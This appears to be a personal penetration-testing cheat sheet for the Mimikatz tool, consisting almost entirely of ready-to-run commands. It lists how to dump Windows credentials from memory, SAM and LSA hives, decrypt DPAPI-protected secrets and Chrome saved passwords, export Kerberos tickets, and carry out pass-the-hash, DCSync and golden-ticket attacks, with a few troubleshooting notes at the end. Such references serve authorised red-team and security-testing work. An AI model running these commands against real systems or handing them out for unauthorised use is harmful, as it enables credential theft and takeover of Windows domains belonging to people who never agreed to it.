Mimikatz
mimikatz (18.7k β) is the most popular tool to dump Windows credentials or perform attacks such as Pass-the-hash/Pass-the-ticket.
PS> .\mimikatz.exe
mimikatz# privilege::debug
mimikatz# # run commands
mimikatz# exit
To dump credentials, hashes, tickets, etc. you can use:
mimikatz# sekurlsa::logonPasswords full # in memory passwords
mimikatz# sekurlsa::ekeys # dump rc4+ntlm hashes
mimikatz# sekurlsa::dpapi # dump DPAPI master key
mimikatz# sekurlsa::tickets /export # dump tickets
mimikatz# lsadump::sam /system:./system.hive /sam:./sam.hive
mimikatz# lsadump::sam /system:./system.hive /sam:./sam.hive /security:./security.hive
mimikatz# lsadump::lsa /patch
mimikatz# vault::list # list credential manager vaults
mimikatz# vault::cred # list credentials
mimikatz# kerberos::list /export # cat b64 | tr -d '\n' | base64 -d > cn.kirbi
To perform a pass-the-hash attack using a rc4
or NTML
hash:
mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:example.com
mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:example.com /run:cmd.exe
mimikatz# sekurlsa::pth /user:xxx /ntlm:XXX /domain:example.com /run:cmd.exe
To perform a DCSync attack (Admin required)
mimikatz# lsadump::dcsync /user:example\krbtgt
mimikatz# lsadump::dcsync /user:example\krbtgt /domain:example.com
We can decrypt secrets encrypted using DPAPI master key using:
mimikatz# dpapi::blob /in:"encrypted_file" /unprotect /masterkey:xxx
mimikatz# dpapi::chrome /in:".\Login Data" /unprotect /masterkey:xxx
To decrypt chrome passwords:
mimikatz# dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
Request a TGS ticket:
mimikatz# kerberos::ask /target:cn # request TGS for cn
π See also: pypykatz for Linux users.
π» To-do π»
Stuff that I found, but never read/used yet.
Golden ticket (Admin not required)
mimikatz# kerberos::golden /user:dummy /domain:dev.example.com /sid:<child domain SID> /krbtgt:<hash> /sids:<target domain SID> /ptt
Got the following errors and no fix worked. I manually dumped the LSASS memory (40MB!) and analyzed it on Linux. Otherwise, use Impacket secrets dump, it works fine.
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
If not the default:
mimikatz# base64 /out:true